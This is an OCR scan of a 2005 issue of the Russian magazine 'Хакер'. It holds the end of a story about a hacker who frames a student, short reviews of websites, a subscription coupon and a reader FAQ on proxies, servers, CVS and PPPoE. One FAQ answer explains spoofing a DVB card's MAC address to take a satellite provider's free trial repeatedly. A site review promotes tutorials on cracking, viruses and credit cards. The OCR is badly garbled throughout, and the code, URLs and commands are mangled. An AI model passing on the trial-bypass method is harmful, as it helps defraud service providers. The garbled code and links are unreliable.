ют клиенты. 

— Если я дам вам список передач за последние полтора месяца, которые 
крутили по В-ТѴ, вы сможете отфильтровать мне тех, кто их смотрел? 

— Можно взглянуть на список? 

Кирякин протянул Николаевичу исписанную бумагу. 

— Отфильтровать, конечно, можно, но я вам сразу могу сказать — это 
будет, по меньшей мере, десяток тысяч людей. Слишком общие крите- 
рии поиска. 

— Что ж, я вам их сокращу. Поищите только среди тех, кто пользовал- 
ся скриптом. 

— Прошу за мной. 
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КРЕАТИФФ 



Они вместе направились к тому самому серверу, стоявшему в углу 
компьютерной лаборатории. За машиной сидел полноватый молодой 
человек в очках и что-то быстро печатал. 

— Гриша, иди погуляй. Нам нужно поработать, — обратился Николае- 
вич к толстяку. 

Гриша подозрительно посмотрел на Кирякина и молча удалился, а его 
место занял шеф. 

Кирякин сразу понял, что Николаевича не зря назначили начальником 
отдела — он настолько уверенно орудовал в логах, что, казалось, всю 
жизнь только этим и занимался. Не прошло и пяти минут, как Николае- 
вич объявил: 

— Есть трое кандидатов. Имя первого — Зіогт, висит на линии кругло- 
суточно. Другой — Кгікип, тянет трафик по вечерам практически каж- 
дый день, любит научные передачи, типа Оізсоѵегу. Третьего зовут 
Веті, он бывает у нас нерегулярно, смотрит разное, но ваши передачи 
и его время в системе совпали. 

— Если можно, распечатайте мне всю информацию, которая у вас на 
них есть. 



Анечка приветливо улыбнулась и принесла ребятам меню. 

— Андрюха, видел, как она на тебя посмотрела? — спросил Марг. 

— Да ладно тебе. Просто приветливость. 

— Приве-етливость, — передразнил Саня, — так и будете всю жизнь 
друг другу глазки строить. 

— Ну что, мне в загс ее отсюда вести? 

— Да для начала хотя бы куда-нибудь пригласить. Точно тебе говорю, 
она к тебе неровно дышит. 

Андрей посмотрел на остальных товарищей, ожидая поддержки. Рома 
пожал плечами: 

— Тебе решать. Не маленький. 

Хакеры на этот раз не стали доставать ноутбук, а просто перекуси- 
ли шашлыком и фирменными салатами. Перед уходом Андрей бро- 
сил друзьям: «Вы идите, я догоню» и быстро, чтобы не успеть пере- 
думать, направился к Ане. Услышав его голос, девушка удивленно 
подняла глаза. 

— Аня... я это... в общем у меня случайно оказались 2 билета на «Бе- 
лый загар». В «Синема холл». Я тут подумал... в общем, не хочешь 
присоединиться? 

— А я уже смотрела этот фильм. 

— Да? А, ну ладно. 

Андрей уже собрался уйти, но Аня остановила. 

— Подожди. Знаешь, мне фильм понравился, и я бы с удовольствием 
посмотрела его снова. 

— Правда? 

— Ага. Когда сеанс? 

— Завтра в 6 вечера. 

— Ладно. Давай тогда без десяти 6 возле входа в кинотеатр? 

— О'кей. Ну ты это, не опаздывай. 

Когда Андрей догнал приятелей, по его сияющему лицу они поняли, 
случилось что-то очень хорошее. 

— Мам, я дома! — из коридора крикнул Ѳгооѵе. 

— А что так рано? 

— Сегодня всего две пары было. 

— У тебя всегда две пары. 

— Не всегда. Позавчера было 6. 

Андрюха прошел в свою компьютерную "берлогу", как называла 
комнату мать, и сел за компьютер. Машинально проверив почто- 
вый ящик, в котором ничего интересного не оказалось, он отки- 
^ нулся на спинку стула и замер. Впервые за долгое время, ему со- 
О вершенно не хотелось торчать у компа. Ковырять новую систему? 
Банально. Скачать из локалки и посмотреть новый фильм? Он 
уже пересмотрел все хорошее, что там было. Потрещать с хакера- 
ми на ІВС? Последние беседы о новых дырках в софте наводили 
на него тоску. Он заметил, что продолжает сидеть за компьюте- 
ром, как будто был привязан к нему невидимой цепью, и мыслен- 
но философствовал, что вообще хорошего есть в компьютерах. 
Нет, конечно, кое-что хорошее в них есть, но что заставляет их си- 
о дѳть целыми днями у монитора? Все-таки разговор с Аней сильно 
5 повлиял на него. 

^ Андрей решил прогуляться в одиночестве по парку, подумать о буду- 
ар щем — погода была замечательная. Но сначала нужно было закончить 

* то, что он начал. 

21 Ѳгооѵе запустил скрипт и зашел на сервер БгеатТУ. Пролистав длин- 



ный список каналов, он выбрал В-ТѴ и нажал Епіег. 

До конца отведенного хакером времени оставалось совсем немного. У 
Кирякина было три имени, но он не мог с уверенностью сказать, кто из 
них взломал его комп. Да и ломал ли именно кто-то из них? Его теория 
с ОгеатТѴ была хрупкой и ненадежной. Но следователь чувствовал, 
что он идет по правильному пути, а за долгие годы службы он привык 
доверять своему чутью. 

Выйдя на крыльцо родного здания, он встретил знакомые лица сотруд- 
ников. 

— Шеф, давай мы твой компьютер поставим под наблюдение. Если 
этот умник сунется снова выполнять свою угрозу, мы его живо прижу- 
чим, — предложил Мишка. 

— Не утруждайся. Саня уже им занимается. Только слабо верится, что 
наш Нострадамус попробует взломать его снова. Он не такой дурак. 

— Я думаю, он вообще блефует. Какой резон хакеру наживать себе 
врага в отделе по ловле хакеров? 

— Судя по предыдущим инцидентам, парень шутить не намерен. 
Кирякин затянулся и выпустил клуб дыма. 

В этот момент зазвонил мобильник. 

— Вадим, иди скорее сюда. Наш хакер, кажется, объявился, — раздал- 
ся из трубки голос Сани Гришко. 

Позвав с собой двух сотрудников, Кирякин быстро поднялся на второй 
этаж, и уже через несколько секунд был в кабинете эксперта, рядом со 
своим компьютером. 

На экране монитора виднелись буквы и цифры, мало что говорившие 
следователю. 

— Кто-то пытается проникнуть на твой компьютер. Я поставил заслон, 
но он продолжает прощупывать вход. 

— Поторопился ты, шеф, с выводами, — заметил Мишка. 

— Сможешь определить, откуда он зашел? — спросил Кирякин. 

— Уже. Странно, но он использует только один прокси-сервер, причем 
крупного провайдера. 

— Что за провайдер? 

— Теіесот 2опе. Мы можем его накрыть прямо сейчас... 

Кирякин его уже не слушал. Узнав в справочной телефон оператора 
Теіесот 2опе, следователь тут же набрал его номер: 

— Здравствуйте. Вас беспокоит майор Вадим Кирякин, отдел «К» МВД. 
Через ваш локальный прокси сейчас совершается взлом сети крупной 
компьютерной компании, нам нужно немедленно установить личность 
того, кто зашел через следующий ІР. 

Саня Г ришко продиктовал Кирякину номер и тот повторил его в трубку. 

— Простите, но мы не предоставляем подобную информацию по теле- 
фону — прозвучал ответ оператора. 

— Послушай, умник! Если ты мне сейчас же не дашь эту информацию, 
компания о которой я говорю лишится таких денег, что тебе за всю 
жизнь потом не отработать. 

В трубке замолчали, судя по всему, переваривая услышанное. 

— Говори, давай! — рявкнул Кирякин. 

— Хорошо. Продиктуйте еще раз ІР. 

Трубка на некоторое время замолчала, но через минуту ожила вновь. 

— Кажется, вы правы. Там удаленное соединение с внешним серве- 
ром. Владелец ІР — Андрей Суворов, запишите адрес и телефон. 

— Благодарю. 

Кирякин кивнул двум сотрудникам: 

— Миха, Олег, едете со мной. Саня, ты удерживай его на линии, сколь- 
ко можешь. Открой свой заслон, я вчера сделал бэкап всех файлов и 
перенес важную инфу на болванки, так что ничего страшного не прои- 
зойдет. 

— Понял. 

Старенький жигуленок, в котором сидели трое сотрудников отдела, вы- 
ехал со двора и на большой скорости помчался в другую часть города. 

Андрей переодевал джинсы для намеченной прогулки, когда услышал 
шум в коридоре. Незнакомый мужской голос интересовался у матери, 
дома ли он. Ѳгооѵе притих. 

— А вы по какому поводу? 

— Ваш сын подозревается в совершении множества компьютерных 
взломов. 

По спине Андрея пробежал неприятный холодок. Он пытался сооб- 
разить, что необходимо сделать в этом случае. Лучшее, что ему 
удалось придумать — запустить на компьютере программу для 
безвозвратного удаления директорий, отметить свои трофеи и на- 
жать «Удалить». Пока столбик на экране выводил процент удален- 
ных файлов, Андрей вытащил из стола папку с распечатками паро- 



лей и, раскрыв форточку, швырнул ее туда. За этим занятием Анд- 
рея застали Кирякин и его коллега. 

— Эй, парень, не так быстро, — взял его под руки следователь. 

Мишка тем временем выдернул шнур питания компьютера из розетки. 

— Я не понимаю, — сопротивлялся паренек. 

— Все ты понимаешь. 

Кирякин посмотрел на часы, висящие на стене, и усмехнулся. 

— Забавно, практически точно в срок. Не ожидал... Нострадамус? 
Андрей смотрел на него совершенно растерянно. 

— Ну, герой, поехали. 

— Куда? 

— В отделение. Мне давно хотелось с тобой пообщаться. Мишка, ты ос- 
тавайся здесь. Сейчас Лиханов приедет с орденом, оформите все как 
положено, с понятыми. Все, что отыщете — в лабораторию. 

— Так точно. 



На следующий день, ровно без десяти 6, Анечка стояла возле кинотеат- 
ра и ждала. Она была рада, что Андрей, наконец, решился предложить 
ей вместе погулять. Но нервничала, так как не так часто ходила с маль- 
чиками в кинотеатр или еще куда-то. Вдруг она скажет что-то не то, и он 
посчитает ее глупой? 

Аня старалась не думать об этом и наблюдала за толпой, высматривая 
там своего кавалера. 

Прошло 10 минут, затем 20... Андрей не показывался. Аня начала 
злиться. Как он там сказал: «Не опаздывай»? Как не стыдно заставлять 
девушку ждать? К тому же, когда сам предложил встретиться. В 17:20 
она окончательно потеряла терпение и, со злостью взглянув на счастли- 
вую парочку, заходящую в киношку, отправилась домой. 

— Не очень-то и хотелось, — подумала она. 

Суд над Андреем Суворовым, известным в хакерском сообществе как 
Огооѵе, состоялся ровно через полгода. На его компьютере нашли дока- 
зательства причастности ко взлому компьютеров Овчинникова, Потапо- 
ва и Кирякина, а также сотни других систем. На его же машине храни- 
лись данные о ворованных кредитных карточках, документы из компью- 



теров правительственных организаций и отчет по расследованию дела 
хакера, известного в отделе как Нострадамус. Андрей на суде пол- 
ностью отрицал свою вину, отказавшись сотрудничать с властями. Но, 
так как доказательства были более чем убедительными, 19-летнего 
Огооѵ'а приговорили к трем годам лишения свободы и штрафу в разме- 
ре 100 минимальных зарплат. 

[эпилог] Антон Кирякин сидел за новым мощным компьютером, кото- 
рый ему выдали после всех достижений, и читал последние новости о 
крупном хакерском портале. Пресса неплохо постаралась, освещая де- 
ло Огооѵ'а. Заголовки: «Хакер против отдела «К» проходили во многих 
центральных газетах. Фамилия Кирякина стала известной, и его даже 
пригласили на новую передачу, полностью посвященную компьютерной 
преступности. Одно было плохо... после дела Нострадамуса, стало 
скучно. Новые инциденты в основном проходили вокруг банальной кра- 
жи паролей доступа в инет и преступлений с кредитными картами. Ки- 
рякину хотелось оригинального дела с достойным соперником. 
Закончив читать новости, он закрыл браузер и откинулся на спинку 
кресла. Ему вспомнился Крым, куда они с Ларисой ездили после поим- 
ки Нострадамуса. Море, солнце, горы и тишина. Следователь посмот- 
рел в окно, где дула метель, и поежился. 

Вдруг компьютер пискнул и сам собой перезагрузился. 

— Старая машинка не капризничала, — подумал Кирякин. 

Он молча ждал, пока загрузится ѴѴіпбоѵѵз ХР и появится рабочий стол. 
Но первое, что увидел после загрузки, были вовсе не родные ярлыки. 
Загораживая волпапер, на экране всплыло яркое окно с текстом, напи- 
санным крупным шрифтом: 

«Здравствуйте, Вадим Сергеевич. Простите, что отрываю вас от ваших 
следовательских дел, просто хотел передать вам привет. Надеюсь, вы 
не забыли меня и мои скромные задачки? Жаль, что вам не удалось ре- 
шить ту, что была адресована вам. Пострадал невиновный человек... 
Как я и обещал, вас ждет наказание, и этим наказанием будет ваша со- 
весть. Андрей Суворов совсем неплохой человек и перспективный 
программист, жаль, что ему придется сидеть в тюрьме за подброшен- 
ные файлы. Все могло сложиться совсем по-другому. Прощайте, Вадим 
Сергеевич. И не пытайтесь больше меня найти — последствия вы зна- 
ете. Искренне ваш, Нострадамус». 

-еоі- 
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Только не «клик»! 

НПр://йоп+сІіск.іТ 

Бродя по всемирной паутине, мы, не задумываясь, со- 
вершаем огромное количество нажатий на свой ма- 
ленький хвостатый девайс, называемый мышкой. 
Кликанье по разнообразным кнопкам, линкам и про- 
чим средствам навигации в умах обывателей превра- 
тилось во что-то само собой разумеющееся. Но стоит 
задуматься: что произойдет, если мы перестанем кли- 
кать? Я уже слышу возмущенные возгласы: «Нет! 
Только не это! Без кликов невозможно полноценно 
серфить Сеть!». Спокойствие, только спокойствие :). 
Ресурс сіопісііск.іі наглядно иллюстрирует то, как мож- 
но передвигаться по Сети, не совершая ни одного 
щелчка по мышке, и не прикасаясь 
к клавиатуре. Если же юзер по при- 
вычке начинает кликать, появляется 
окно с таймером десятисекундного об- 
ратного отсчета, предупреждающее 
о том, что произведен ненужный клик. 
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Виртуальная Москва 

\ллллллѵср$егѵег.ги 

Перед тобой проект под названием «Виртуаль- 
ная Москва». Это полноценный виртуальный 
город, полностью копирующий столицу нашей 
с тобой Родины. Разработчики проекта пере- 
несли в виртуальное пространство целый го- 
род. На момент написания статьи постройка 
виртуальной столицы подходила к завершаю- 
щему этапу. Просмотрев скриншоты и демо-ви- 
део, я убедился в действительно огромных 
масштабах строящегося города. Степень про- 
работки улиц, парков, скверов и площадей 
просто поражает своей реалистичностью. По 
виртуальному городу уже начинают экскурсии 
первые виртуальные жители, ездят первые ав- 
томобили и даже располагается первая вирту- 
альная реклама. Если ты тоже хочешь прой- 
тись по виртуальной Москве и стать первопро- 
ходцем, то сайт предоставляет всем желаю- 
щим стать бета-тестерами проекта. 



Трапеза со звездой 

\ллллл/.сеІеЬгі1-іѳ5-ѳа1'іпд.сот 
Интернет просто кишит сайтами, освещающи- 
ми жизнь различных звезд. Тут тебе и эроти- 
ческие сайты, показывающие знаменитостей в 
стиле ню, и фанатские сайты, кричащие, что 
именно он — их кумир, самый звездатый и так 
далее. Но сейчас речь пойдет немного о дру- 
гом. Сайт сеІеЬгіііез-еаііпд.сот посвящен все 
тем же звездным знаменитостям, но показыва- 
ет он то, как они принимают пищу. На сайте 
просто куча фотографий известных людей, 
застигнутых врасплох за поглощением еды. 
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Некоторые фотографии действительно зани- 
мательные и смешные. На форуме ресурса 
поклонники звезд комментируют те или иные 
фотографии и делятся впечатлениями. Так что 
если и тебе нечем будет заняться на досуге, 
можешь посетить этот сайт и насладиться «за- 
нимательным» контентом. 

Ргодгаттіпд Вііз 

\ллллл/.а 2 іІІіоптопкеуз.сот 
Довольно интересный сайт, посвященный различ- 
ным программерским трюкам, примочкам, алго- 
ритмам на языках Си, С++, Азт и прочее. Сайт бу- 
дет одинаково интересен как начинающим, так и 
кончающим программерам :). Отдельно выделе- 
ны разделы, посвященные старику 005'у, компи- 
лятору ѴѴАТСОМ С/С++, оптимизации Репйит, иг- 
ровым алгоритмам, ассемблеру х86 (смотри кноп- 
ки сверху на сайте). Присутствует также компью- 
терный юмор и компьютерная ностальгия. Но сайт 
полностью на английском языке. 

Программирование 
мобильных устройств 

\ллллллтоЬіІаЬ.ги 

Хочешь научиться создавать игры для мобиль- 
ных телефонов? Разобраться с ѴѴігеІезз 
Меззадіпд АРІ (ѴѴМА) для отправки и получения 
5МЗ? Узнать подробности о вирусах и троянах 
для мобильных устройств? Изучить языки прог- 
раммирования для телефонов и КПК? Тогда иди 
на сайт МоЬіІІ_аЬ! Сайт имеет три основных нап- 
равления: Оаѵа, Вазіс и программирование для 
ЗутЬіап ОС. В разделе «Софт» можно скачать 
полезные программы, в том числе для мобиль- 
ных телефонов и КПК. Ну и конечно, форум 
ждет очередного «мобильного» программиста. 

Дух хакинга 
и крэкинга 

\ллллллНпсЗк.сот 

Если ты хочешь, чтобы в тебя вселился «дух» 
хакинга и крэкинга, то тебе нужно посетить 



этот сайт. Отборные туториалы на английском 
расскажут тебе, как ломать софт и создавать 
кейгены, как хакать сети аоі, тзп, Ноітаіі, ігс и 
прочее. Узнаешь, как создать свою вирусную 
программу, все о кредитных картах, туториалы 
по работе с различными хакерскими тулзами и 
описания известных дыр с примерами эксплой- 
тов. Здесь же можно скачать различные фри- 
керские утилиты и еще много всего. Как гово- 
рится, не проходи мимо! 

Компьютерная 
история в лицах 

\ЛАЛЛЛЛІПЯ'1І$ТМ .ш 

С какого периода следует отсчитывать компь- 
ютерную историю? С первой ЭВМ? Или, может, 
с механического арифмометра? Или с абака? 
А может, с изобретения системы счисления? 
Многие сотни выдающихся людей внесли свой 
вклад в развитие компьютерного мира. Автор 
данного проекта решил собрать их всех в одну 
большую электронную энциклопедию. В ней ты 
найдешь информацию о Билле Гейтсе и Поле 
Аллане, о Линусе Торвальдсе и изобретателе 
языка Си — Дэннисе Ритчи, о Блезе Паскале и 
Чарльзе Пирсе и многих других. Воспользуйся 
поиском или алфавитным списком. 

Программирование 
на языке Сепіее 

\лАллл/.деп1-ее.ги 

Ѳепіее — это бесплатный язык программиро- 
вания, своим синтаксисом похожий на С/С++. 
Его можно использовать для автоматизации 
различных операций и внедрять в программы 
на других языках. Для компиляции и выполне- 
ния Оепіее-программ необходима ЭИ-библио- 
тека, которая занимает примерно 100 Кб. На 
сайте можно посмотреть примеры использова- 
ния этого языка, а также получить подробную 
информацию по его синтаксису. Там же можно 
скачать сам язык и пообщаться на форуме с 
разработчиками и пользователями © 
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ЗАКАЗ ЖУРНАЛА В РЕДАКЦИИ 



«Хакер» +2 СО 



«Хакер» +0Ѵ0 



«Хакер» + «Хакер| 



» 



1 15р 


ЗА НОМЕР 

(экономия 30руб.*) 


1 3Ор ЗА НОМЕР 

(экономия 30руб.*) 


207р 


ЗА НОМЕР 

(экономия 85руб.*) 


690р 


ЗА 6 МЕСЯЦЕВ 

(экономия 180 руб.*) 


780р ЗА 6 МЕСЯЦЕВ 

(экономия 1 80 руб.*) 


1 24 2р 


ЗА 6 МЕСЯЦЕВ 

(экономия 510 руб.*) 


1 242р 


ЗА 12 МЕСЯЦЕВ 

(экономия 460руб.*) 


1404р ЗА 12 МЕСЯЦЕВ 

(экономия 516 руб.*) 


2236р 


ЗА 12 МЕСЯЦЕВ 
(экономия 1250 руб.*) 



Как оформить заказ? 

И Заполнить купон и квитанцию 
0 Перечислить стоимость подписки через Сбербанк 
Э Обязательно прислать в редакцию копию оплаченной квитанции 
с четко заполненным купоном любым из перечисленных способов: 

во по электронной почте: зиЬзсгіЬе@дІс.ги; 

во по факсу: 780.88.24; 

во по адресу: 107031, Москва, Дмитровский переулок, д. 4, 

строение 2, ООО «Гейм Лэнд», отдел подписки. 

ВНИМАНИЕ! 

во подписка оформляется в день обработки купона и квитанции. 
во купоны, отправленные по факсу или электронной почте, обрабатываются в течение 5 рабочих дней, 
во купоны, отправленные почтой на адрес редакции обрабатываются в течение 20 дней. 

РЕКОМЕНДУЕМ ИСПОЛЬЗОВАТЬ ЭЛЕКТРОННУЮ ПОЧТУ ИЛИ ФАКС. 

Подписка производится с номера, выходящего через один календарный месяц после оплаты. 

Например, если произвести оплату в сентябре, то подписку можено оформить с ноября. 

ПО ВСЕМ ВОПРОСАМ, СВЯЗАННЫМ С ПОДПИСКОЙ, ЗВОНИТЕ ПО БЕСПЛАТНЫМ ТЕЛЕФОНАМ: 
935 - 70-34 (ДЛЯ МОСКВИЧЕЙ) И 8 - 800 - 200 - 3-999 (ДЛЯ РЕГИОНОВ И АБОНЕНТОВ МТС, БИЛАЙН, 
МЕГАФОН). ВСЕ ВОПРОСЫ ПО ПОДПИСКЕ МОЖНО ПРИСЫЛАТЬ НА АДРЕС: ІМРОѲОІ.С.ПІІ 



Подписка 

для юридических лиц 

Москва: ООО "Интер-Почта", 
тел.: 500-00-60, е-плаіі: іпіег-ро5І@зоѵіпІеІ.ги 
Регионы: ООО "Корпоративная почта", 
тел.: 953-92-02, е-плаіі: крр@зоѵіп1еІ.ги 
Для получения счета на оплату подпис- 
ки нужно прислать заявку с названием 
журнала, периодом подписки, банковс- 
кими реквизитами, юридическим и поч- 
товым адресом, телефоном и фамили- 
ей ответственного лица за подписку. 
ѵѵѵѵѵѵ.іпіегрос^а.ги 
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ПОДПИСНОЙ КУПОН 

Прошу оформить подписку: 

I I на журнал Хакер + 2 Сй 
на журнал Хакер + йѴй 
на комплект Хакер +2 СО и Хакер Спец + СО 
на комплект Хакер+ ОѴО и Хакер Спец + СО 

на | | месяцев 

начиная с 2005 г. 

|—| Доставлять журнал по почте 
*— 1 на домашний адрес 
і— I Доставлять журнал курьером на 
1 адрес офиса (по г. Москве) 

Подробнее о курьерской доставке читайте ниже 
(отметьте квадрат выбранного варианта подписки) 

Ф.И.О. 



пп. пп. пп,. 

день месяц год 

АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ) 

код 

е-таіі 

сумма оплаты 

* Курьерская доставка осуществляется только по Москве 
на адрес офиса. Для оформления доставки курьером 
укажите адрес и название фирмы в подписном купоне. 



№ 



Извещение 


ИНН 7729410015 ООО «Гейм Лэнд» 


ЗАО Международный Московский Банк, 


г. Москва 




р/с № 40702810700010298407 




к/с № 30101810300000000545 




БИК 044525545 


КПП -772901001 




Плательщик 




Адрес (с индексом) 




Назначение платежа 

Оплата за « » 

с 2005 г. 


Сумма 


Кассир 


месяц 

Ф.И.О. 


Подпись плательщика 






Квитанция 


ИНН 7729410015 ООО «Гейм Лэнд» 


ЗАО Международный Московский Банк, 


г. Москва 




р/с № 40702810700010298407 




к/с № 30101810300000000545 




БИК 044525545 


КПП -772901001 




Плательщик 




Адрес (с индексом) 




Назначение платежа 

Оплата за « » 

с 2005 г. 


Сумма 




месяц 

Ф.И.О. 


Кассир 


Подпись плательщика 








ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20ЫЕ РЕВВІІМ НЬЮСЫ 



* 

і4 



ВАДАВАц ВОПРОС, ПОДУМАЙ! не сто- 
4Т МНЕ ПОСЫЛАТЬ ВОПРОСЫ, ТАК ИЛИ 
"ИНАчЕ СВцЗАННЫЕ С ХАКОМ/КРЭКОМ/ФРИКОМ 
— ДЛц ЭТОГО ЕСТЬ НАСК-РАО 
(НАСКРАС)@ВЕАІ_.ХАКЕР.ВІІ), НЕ СТОИТ ТАКЖЕ 



ЗАДАВАТЬ ОТКРОВЕННО ЛАМЕРСКИЕ ВОПРО- 
СЫ, ОТВЕТ НА КОТОРЫЕ ТЫ ПРИ ОПРЕДЕЛЕН- 
НОМ ЖЕЛАНИИ МОЖЕШЬ НАЙТИ И САМ. Я НЕ 
ТЕЛЕПАТ, ПОЭТОМУ КОНКРЕТИЗИРУЙ ВОП- 
РОС, ПРИСЫЛАЙ КАК МОЖНО БОЛЬШЕ ИНФОР- 



РАСЮОММЕІЧТЗ 




51ер 

(!ад@геаІ.хакер.ш) 



О: Каким образом на РНР можно проверить прокси на ано- 
нимность? 

А: Вспомни, как бы ты проверял прокси вручную: сначала ус- 
тановил ее в настройках браузера, затем зашел бы на сайт 
(например, ѵѵѵѵѵѵ.аіі-пеііооіз.сот), который может определить 
использование прокси, а заодно и твой текущий ІР. Дальше 
просто: если на сайте засветился твой настоящий ІР, значит, 
прокси — фигня; если не засветился — ей можно доверять. 
Скрипт для проверки прокси с помощью РНР можно напи- 
сать по этому же самому алгоритму. В реализации значи- 
тельно облегчит задачу РНР-класс Зпоору, который умеет 
эмулировать работу обычного веб-браузера. Итак, проверку 
можно реализовать примерно следующим образом: 

// подключаем класс 
іпсIис^е( , ./пе^сIазз.рI^р , ); 

// создаем экземпляр класса Зпоору 
$пеІ = пеѵѵ Зпоору; 

// подключаем прокси и инициируем подключение 
$пе1->адеп1='Мо2Ша/4.0 (сотраШэІе; МЗІЕ 5.5; ѴѴіпсІоѵѵз 
98)'; 

$пеІ->ргоху_[ю5І='1 27. 0.0.1'; 

$пеІ->ргоху_рогІ='3128'; 

$пеІ->геасМітеоиІ=30; 

//запрашиваем страницу, которая отображает список пе- 
ременных окружения 

$пеІ->ІеІс!і("[іНр://[іоте.хпеІсот/~еІІІапсІІЛезІ-епѵ.сді"); 

$гез=$пеІ->гезиІІз; 

Теперь объект скалярного типа $гез хранит страницу, со- 
держащую значения твоих переменных окружения. Для нас, 
как известно, критичны переменные НТТР_ѴІА, НТТР_Х_РОВ- 
ѴѴАРЮЕО_РОВ. Тебе остается только проанализировать их: 
если они содержат исключительно адрес сервера, с которо- 
го был запущен скрипт, можно считать прокси анонимной. 

О: Помогите советом. Я занимаюсь разработкой одного ин- 
тересного проекта. Вот уже год проект набирает популяр- 
ность, причем так, что виртуальный хостинг не справляется 
с нагрузкой. Выход один: приобрести свой собственный вы- 
деленный сервер. Так вот, какую конфигурацию сервера 
желательно приобрести, если на сайт ежедневно приходит 
300000 хитов? Работает контент-система (СМ3) и 2 фору- 
ма, которые написаны на РНР и используют Му5СН_. При 
этом большая часть трафика — текст, а файлов передает- 
ся совсем мало. 

А: Очень сложно ответить на этот вопрос заочно, не погля- 
дев на внутренности используемых скриптов. По своему 
опыту скажу, что наибольшая часть нагрузки бесспорно ле- 
жит на форумах и МуЗОІ_. С конфигурацией можно поэкс- 
периментировать, выпросив у хостеров тестовые периоды. 
Но я бы на твоем месте сразу брал беспроигрышный вари- 
ант. Например, сервер с двумя Хеоп'ами, не меньше чем ги- 
габайтом оперативки и, естественно, ЗСЗІ-винтами. В этом 
случае можно гарантировать, что сервер не загнется в час 
пик. Тем более ты сам сказал, что посещаемость растет, 
поэтому мощный сервер будет очень кстати. 

О: Прочитал вашу статью «Небесные радости» о спутнико- 
вом телевидении, мне очень понравилось. Разобрался, пос- 
тавил — работает! С недавних пор начал использовать еще 
и спутниковый интернет. Заметил, что некоторые провайде- 



ры предоставляют бесплатный тестовый доступ. Есть ли 
способы обойти их защиты и брать этот доступ несколько 
раз? Р.З. Я использую РѴВ-карту 5ку31аг2. 

А: Большинство ЗАТ-провайдеров привязывают учетные 
записи к МАС-адресу ОѴВ-карты, которую использует поль- 
зователь. Однажды оформив подписку на свою БѴВ-карту, 
повторно ты зарегистрироваться в системе уже не смо- 
жешь, так как система будет ругаться и говорить, что поль- 
зователь с указанным М АС-адресом уже существует. Точно 
такая же проверка распространяется и на тестовые подпис- 
ки. Обойти такую защиту — проще некуда: нужно лишь из- 
менить МАС-адрес ОѴВ-карты. Под Ыпих'ом это выполняет- 
ся стандартным іісопіід, а под ѴѴіпсІоѵѵз — специальной тул- 
зой 332 ІІпІоскег ( Ыір://изегз.ІеоІ.пеі/~ѵзіпіза/зкуз1аг2еер - 
готесіііог.гір). Однако использовать этот прием я тебе нас- 
тоятельно не рекомендую. Если каждый будет заказывать 
себе бесплатные подписки по 10 раз на день, очень скоро 
провайдер попросту прекратит их раздачу. Люди, которые 
действительно хотели бы проверить сервис, останутся не 
у дел, а ведь среди них вполне мог оказаться и ты! 

О: Сколько байтов в килобайте? 

А: Возможно, кто-то прикалывался, посылая этот вопрос в 
РАО, но прикольнулся он в тему. Каждый знает, что в кило- 
байте 1024 байта (10 степень 2-ки). Любого, кто считает ина- 
че (1000 байт), тут же отправляют учить матчасть и учебни- 
ки по информатике. А ведь на самом деле эти несчастные и 
угнетенные правы! Греческий корень «кило», вообще гово- 
ря, обозначает именно умножение на 1000, но уж никак не 
степень двойки. Откуда пошла такая несуразица — не ясно. 
И все бы ничего, если в 1 999 году Международная электри- 
ческая комиссия не решилась эту несуразицу исправить. Ре- 
бята, недолго думая, придумали для обозначения 1024 байт 
понятие двоичного килобайта (сокращенно кибибайт). Са- 
мое смешное, что эти новшества в 2000 году официально 
были записаны в международный стандарт — ІЕС 60027-2 
(2000-11). Справедливости ради стоит сказать, что эти непо- 
нятные сокращения не прижились: учебники, к примеру, по- 
прежнему продолжают утверждать, что Кб — это 2 Л 10, и ни- 
как иначе. Зато неразбериху в стандартах начали использо- 
вать в своих целях некоторые провайдеры, которые умело 
считают за мегабайт 1000 байтов, обманывая при этом не- 
понятливых пользователей. Навар в 24 байта с каждого ме- 
габайта — это на самом деле не так мало, как ты думаешь... 
А жаловаться не на что: стандарт-то ведь есть! 

О: Что такое СѴЗ, и почему она так часто используется 
программистами в больших проектах? 

А: СѴЗ (Сопсиггепі Ѵегзіопз Зузіет) — это система сосуще- 
ствования версий. Инструмент, без которого не представля- 
ют своей работы тысячи программистов по всему миру. 
Представь, что ты постоянно занимаешься каким-нибудь 
большим проектом, например, разрабатываешь браузер. 
Каждый день тебе приходится вносить в код кучу измене- 
ний, добавляя в него сотни или даже тысячи новых строк. 
Естественно, запомнить в уме, где и какие изменения про- 
изведены, невозможно. Быть может, ты будешь помнить о 
них через день или два, но точно не через неделю или ме- 
сяц. Именно поэтому крайне необходимо постоянно вести 
базу изменений: если через некоторое время всплывет ка- 
кая-то неприятная ошибка, можно легко просмотреть изме- 
ненный код. Программисту при таком раскладе значитель- 










но помогла бы автоматическая система, которая ведет список 
всех изменений в коде. Такая, как СѴ5. Эта система отслеживает 
все изменения в исходниках и сохраняет многочисленные версии 
ПО. Если что-то вдруг сломалось в последней версии, тебе не сос- 
тавит труда вернуться к более старой и исправить ошибку. Но это 
еще не все. Ключевой функцией СѴ5 является координация рабо- 
ты группы программистов. Каждому из них нужно работать толь- 
ко с последней версией каждого из исходных файлов, при этом 
быть уверенным, что его в данный момент не редактирует кто-то 
другой. К счастью, СѴ5 отлично справляется с этой задачей, пре- 
доставляя удаленный доступ к исходным файлам для закачки са- 
мого «свежего» исходного текста. Если раньше такая система бы- 
ла популярна среди разработчиков свободного ореп-зоигсе соф- 
та, то теперь она (необязательно СѴЗ, есть и аналоги) завоевала 
популярность и в процессе разработке коммерческих продуктов. 
Некоторые из них разрабатываются и дорабатываются многие го- 
ды, при этом состав программистов постоянно меняется. Если 
поступающий на работу программист знаком с СѴЗ (упоминание 
о которой, кстати говоря, часто стало появляться в списке требо- 
ваний), то ему будет гораздо проще освоиться с чужим кодом и 
быстро приступить к работе. Подробнее о системе ты можешь про- 
читать на сайте і /ѵтѵ.попдпи.огд/сѵз/. Перевод документации на рус- 
ский лежит на сайте ІіпихІапсІ.іІат.пзс.ги/Ьоок/ІіпихОЗ/посІеІ ІО.МтІ. 
Рекомендую. 

О: Подскажи, как в Ребога Соге настроить РРРоЕ-подключение к 
провайдеру? 

А: Для этого в Ребога имеется специальный пакет РРРоЕ. Устано- 
вить его можно, как и любую другую грт-ку. Под рутом в консоле 
набери: 

#грт -і гр-рррое-3.5-29.і386.грт, где гр-рррое-3.5-29.і386.грт — 
это имя ВМР-пакета 



Если пакет установится правильно, можно приступать к следую- 
